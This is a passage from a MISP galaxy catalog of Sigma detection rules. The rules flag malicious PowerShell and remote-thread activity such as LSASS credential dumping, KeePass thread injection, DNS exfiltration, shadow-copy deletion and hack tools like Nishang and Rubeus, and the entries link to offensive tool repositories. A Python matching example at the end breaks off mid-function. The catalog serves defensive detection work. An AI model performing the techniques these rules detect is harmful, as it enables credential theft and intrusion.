  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9781. Table References

Links

https://github.com/adrecon/AzureADRecon

https://github.com/besimorhino/powercat

https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1

https://github.com/calebstewart/CVE-2021-1675

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/samratashok/nishang

https://github.com/Kevin-Robertson/Powermad

https://github.com/HarmJ0y/DAMP

https://github.com/adrecon/ADRecon

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9782. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml

Clearing Windows Console History

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

The tag is: misp-galaxy:sigma-rules="Clearing Windows Console History"

Clearing Windows Console History has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9783. Table References

Links

https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/

https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics

https://www.shellhacks.com/clear-history-powershell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml

HackTool - Rubeus Execution - ScriptBlock

Detects the execution of the hacktool Rubeus using specific command line flags

The tag is: misp-galaxy:sigma-rules="HackTool - Rubeus Execution - ScriptBlock"

HackTool - Rubeus Execution - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 9784. Table References

Links

https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_hktl_rubeus.yml

Powershell XML Execute Command

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code

The tag is: misp-galaxy:sigma-rules="Powershell XML Execute Command"

Powershell XML Execute Command has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9785. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml

Suspicious PowerShell Invocations - Specific

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Specific"

Suspicious PowerShell Invocations - Specific has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9786. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml

Windows Defender Exclusions Added - PowerShell

Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusions Added - PowerShell"

Windows Defender Exclusions Added - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9787. Table References

Links

https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml

Suspicious X509Enrollment - Ps Script

Detects use of X509Enrollment

The tag is: misp-galaxy:sigma-rules="Suspicious X509Enrollment - Ps Script"

Suspicious X509Enrollment - Ps Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 9788. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42

https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml

Malicious Nishang PowerShell Commandlets

Detects Commandlet names and arguments from the Nishang exploitation framework

The tag is: misp-galaxy:sigma-rules="Malicious Nishang PowerShell Commandlets"

Malicious Nishang PowerShell Commandlets has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9789. Table References

Links

https://github.com/samratashok/nishang

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml

Suspicious GetTypeFromCLSID ShellExecute

Detects suspicious Powershell code that executes COM Objects

The tag is: misp-galaxy:sigma-rules="Suspicious GetTypeFromCLSID ShellExecute"

Suspicious GetTypeFromCLSID ShellExecute has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9790. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml

WMImplant Hack Tool

Detects parameters used by WMImplant

The tag is: misp-galaxy:sigma-rules="WMImplant Hack Tool"

WMImplant Hack Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9791. Table References

Links

https://github.com/FortyNorthSecurity/WMImplant

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml

Registry-Free Process Scope COR_PROFILER

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external to .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)

The tag is: misp-galaxy:sigma-rules="Registry-Free Process Scope COR_PROFILER"

Registry-Free Process Scope COR_PROFILER has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="COR_PROFILER - T1574.012" with estimative-language:likelihood-probability="almost-certain"

Table 9792. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml

Powershell DNSExfiltration

DNSExfiltrator allows for transferring (exfiltrating) a file over a DNS request covert channel

The tag is: misp-galaxy:sigma-rules="Powershell DNSExfiltration"

Powershell DNSExfiltration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 9793. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh

https://github.com/Arno0x/DNSExfiltrator

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml

Invoke-Obfuscation Via Use MSHTA - PowerShell

Detects Obfuscated Powershell via use MSHTA in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - PowerShell"

Invoke-Obfuscation Via Use MSHTA - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9794. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml

Potential Persistence Via Security Descriptors - ScriptBlock

Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Security Descriptors - ScriptBlock"

Table 9795. Table References

Links

https://github.com/HarmJ0y/DAMP

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml

Powershell WMI Persistence

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.

The tag is: misp-galaxy:sigma-rules="Powershell WMI Persistence"

Powershell WMI Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9796. Table References

Links

https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml

Code Executed Via Office Add-in XLL File

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs

The tag is: misp-galaxy:sigma-rules="Code Executed Via Office Add-in XLL File"

Code Executed Via Office Add-in XLL File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9797. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml

Powershell Directory Enumeration

Detects technique used by MAZE ransomware to enumerate directories using Powershell

The tag is: misp-galaxy:sigma-rules="Powershell Directory Enumeration"

Powershell Directory Enumeration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 9798. Table References

Links

https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml

Automated Collection Bookmarks Using Get-ChildItem PowerShell

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

The tag is: misp-galaxy:sigma-rules="Automated Collection Bookmarks Using Get-ChildItem PowerShell"

Automated Collection Bookmarks Using Get-ChildItem PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 9799. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml

Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

The tag is: misp-galaxy:sigma-rules="Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script"

Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9800. Table References

Links

https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml

Invoke-Obfuscation CLIP+ Launcher - PowerShell

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - PowerShell"

Invoke-Obfuscation CLIP+ Launcher - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9801. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml

PowerShell Get-Process LSASS in ScriptBlock

Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity

The tag is: misp-galaxy:sigma-rules="PowerShell Get-Process LSASS in ScriptBlock"

PowerShell Get-Process LSASS in ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9802. Table References

Links

https://twitter.com/PythonResponder/status/1385064506049630211

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml

Suspicious IO.FileStream

Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.

The tag is: misp-galaxy:sigma-rules="Suspicious IO.FileStream"

Suspicious IO.FileStream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9803. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml

Invoke-Obfuscation Via Stdin - Powershell

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - Powershell"

Invoke-Obfuscation Via Stdin - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9804. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml

Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript"

Table 9805. Table References

Links

https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml

PowerShell Script With File Upload Capabilities

Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.

The tag is: misp-galaxy:sigma-rules="PowerShell Script With File Upload Capabilities"

PowerShell Script With File Upload Capabilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 9806. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md

https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml

Root Certificate Installed - PowerShell

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="Root Certificate Installed - PowerShell"

Root Certificate Installed - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 9807. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml

Potential Defense Evasion Via Raw Disk Access By Uncommon Tools

Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts

The tag is: misp-galaxy:sigma-rules="Potential Defense Evasion Via Raw Disk Access By Uncommon Tools"

Potential Defense Evasion Via Raw Disk Access By Uncommon Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006" with estimative-language:likelihood-probability="almost-certain"

Table 9808. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml

Password Dumper Remote Thread in LSASS

Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.

The tag is: misp-galaxy:sigma-rules="Password Dumper Remote Thread in LSASS"

Password Dumper Remote Thread in LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9809. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml

Rare Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

The tag is: misp-galaxy:sigma-rules="Rare Remote Thread Creation By Uncommon Source Image"

Rare Remote Thread Creation By Uncommon Source Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9810. Table References

Links

https://lolbas-project.github.io

Personal research, statistical analysis

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml

Remote Thread Creation In Mstsc.Exe From Suspicious Location

Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation In Mstsc.Exe From Suspicious Location"

Table 9811. Table References

Links

https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml

Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation By Uncommon Source Image"

Remote Thread Creation By Uncommon Source Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9812. Table References

Links

https://lolbas-project.github.io

Personal research, statistical analysis

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml

Remote Thread Creation Via PowerShell In Uncommon Target

Detects the creation of a remote thread from a Powershell process in an uncommon target process

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation Via PowerShell In Uncommon Target"

Remote Thread Creation Via PowerShell In Uncommon Target has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9813. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml

Remote Thread Created In KeePass.EXE

Detects remote thread creation in "KeePass.exe" which could indicate potential password dumping activity

The tag is: misp-galaxy:sigma-rules="Remote Thread Created In KeePass.EXE"

Remote Thread Created In KeePass.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005" with estimative-language:likelihood-probability="almost-certain"

Table 9814. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa20-259a

https://github.com/GhostPack/KeeThief

https://github.com/denandz/KeeFarce

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_keepass.yml

HackTool - Potential CobaltStrike Process Injection

Detects a potential remote thread creation with certain characteristics which are typical for Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="HackTool - Potential CobaltStrike Process Injection"

HackTool - Potential CobaltStrike Process Injection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

Table 9815. Table References

Links

https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f

https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cobaltstrike.yml

Remote Thread Creation Ttdinject.exe Proxy

Detects a remote thread created by Ttdinject.exe when it is used as an execution proxy

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation Ttdinject.exe Proxy"

Remote Thread Creation Ttdinject.exe Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 9816. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml

Remote Thread Creation In Uncommon Target Image

Detects uncommon target processes for remote thread creation

The tag is: misp-galaxy:sigma-rules="Remote Thread Creation In Uncommon Target Image"

Remote Thread Creation In Uncommon Target Image has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003" with estimative-language:likelihood-probability="almost-certain"

Table 9817. Table References

Links

https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml

Potential Credential Dumping Attempt Via PowerShell Remote Thread

Detects remote thread creation by PowerShell processes into "lsass.exe"

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Attempt Via PowerShell Remote Thread"

Potential Credential Dumping Attempt Via PowerShell Remote Thread has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9818. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_lsass.yml

HackTool - CACTUSTORCH Remote Thread Creation

Detects remote thread creation from CACTUSTORCH as described in references.

The tag is: misp-galaxy:sigma-rules="HackTool - CACTUSTORCH Remote Thread Creation"

HackTool - CACTUSTORCH Remote Thread Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

Table 9819. Table References

Links

https://twitter.com/SBousseaden/status/1090588499517079552

https://github.com/mdsecactivebreach/CACTUSTORCH

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_hktl_cactustorch.yml
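The remote-thread rules in this section (PowerShell into an uncommon target, any process into KeePass.exe, PowerShell into lsass.exe, and uncommon target images in general) all key on the same two Sysmon Event ID 8 fields, SourceImage and TargetImage. The following is an added example, not code from the MISP galaxy or from the SigmaHQ rules it links to: it evaluates constructed CreateRemoteThread records against a simplified reading of those descriptions. The target lists (POWERSHELL_EXPECTED_TARGETS, UNCOMMON_TARGETS) are illustrative assumptions, not the rules' own curated filter lists.

```python
"""Evaluate Sysmon Event ID 8 (CreateRemoteThread) records against the
remote-thread rules described in this section.

Added example, not code from the MISP galaxy or the SigmaHQ rules. Field
names follow Sysmon's Event ID 8 (SourceImage, TargetImage,
SourceProcessId, TargetProcessId). The target lists are assumptions for
illustration; the real rules carry longer, curated lists.
"""
from __future__ import annotations

POWERSHELL_IMAGES = (r"\powershell.exe", r"\pwsh.exe", r"\powershell_ise.exe")
# Assumed: targets a PowerShell host is expected to create threads in.
POWERSHELL_EXPECTED_TARGETS = POWERSHELL_IMAGES + (r"\csc.exe",)
# Assumed: images in which a remote thread is rarely legitimate.
UNCOMMON_TARGETS = (r"\notepad.exe", r"\calc.exe", r"\mspaint.exe",
                    r"\wordpad.exe", r"\explorer.exe", r"\svchost.exe")


def _ends_with_any(path: str, suffixes: tuple[str, ...]) -> bool:
    lowered = path.lower()
    return any(lowered.endswith(s) for s in suffixes)


def evaluate_remote_thread(event: dict) -> list[str]:
    """Return the rule names (as listed in this section) the event matches."""
    src = event.get("SourceImage", "")
    dst = event.get("TargetImage", "")
    dst_lower = dst.lower()
    hits: list[str] = []
    # Defensive: only cross-process thread creation is of interest here.
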